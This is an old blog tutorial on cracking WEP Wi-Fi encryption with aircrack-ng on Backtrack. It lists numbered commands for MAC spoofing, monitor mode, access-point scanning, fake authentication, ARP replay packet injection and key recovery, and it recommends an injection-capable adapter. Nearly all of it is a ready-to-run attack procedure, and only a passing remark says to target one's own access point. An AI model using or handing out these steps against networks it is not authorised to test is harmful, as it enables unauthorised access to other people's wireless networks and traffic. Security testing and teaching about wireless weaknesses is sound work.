Tuesday, 14 August 2012

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I' ll get back to you.

Requirements
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode. It wont work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H . It is cheap, reliable and works out of the box.

Commands
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger -m 00:11:22:33:44:55 wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0 
  6. ifconfig mon0 down
  7. macchanger -r (random mac) mon0
  8. ifconfig mon0 up
  9. airodump-ng mon0 (scan for APs)
  10. Wait for a minute
  11. CTRL + C (stop scanning)
  12. Pick your own AP with WEP encryption
  13. airodump-ng -c (channel) -w (filename) —bssid (xx:xx:xx:xx:xx:xx) mon0
    • -w file, in which the data will be saved.
  14. —You need around 10k of data to successfully crack WEP—
  15. Open another console
  16. aireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0
  17. Wait for ”Association succcessful”
  18. aireplay-ng -3 -b (BSSID) -e (ESSID) mon0 (starts the injection)
    • data in the other console should now  increase significantly
  19. open another console
  20. aircrack-ng (filename.cap) 
    •  path to the file from step 13. e.g. ~/Desktop/test.cap
  21. Wait for —Key Found—
  22. Enter Key without ‘:’.
This can be done in approx. 10 minutes. Have fun!

5 comments: